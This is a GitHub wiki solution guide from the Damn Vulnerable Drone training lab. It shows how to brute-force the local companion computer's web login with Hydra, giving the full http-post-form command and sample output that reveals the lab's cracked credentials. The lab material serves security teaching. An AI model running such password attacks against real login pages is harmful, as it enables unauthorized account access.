Companion Computer Web UI Login Brute Force - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki
Executing password brute force attacks on the companion computer's web-based user interface using Hydra.
Damn Vulnerable Drone > Attack Scenarios > Injection > Companion Computer Web UI Login Brute Force
This scenario involves using Hydra, a popular brute-force tool, to crack the login credentials for the Companion Computer's Web UI located at http://localhost:3000. By following this guide, you will learn how to perform a password attack on a web-based interface and understand the principles of brute-forcing login forms via HTTP POST.
⚠️ Solution Guide
sudo apt-get install hydra
Most Kali Linux images already include Hydra by default.
Open http://localhost:3000 in your browser. Use DevTools (right-click → Inspect → Network tab) to find:
- The login form POST endpoint (e.g.,
/login) - The form field names (e.g.,
username,password) - The response string that indicates a failed login (e.g., "Invalid credentials")
You can use the built-in password list from Damn Vulnerable Drone:
https://github.com/nicholasaleks/Damn-Vulnerable-Drone/tree/master/simulator/mgmt/templates/pages/attacks/injection/passwords.txt
Download it or use your own custom wordlist.
Assuming the username is admin and the password list is named passwords.txt:
hydra -l admin -P passwords.txt http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid" -s 3000
-
-lsets the username -
-Pspecifies the password list -
http-post-formtargets the login route -
:Invalidtells Hydra what string indicates a failed login
If successful, Hydra will display the cracked credentials:
[3000][http-post-form] host: localhost login: admin password: cyberdrone
You can now log into the Companion Computer Web UI with the recovered credentials.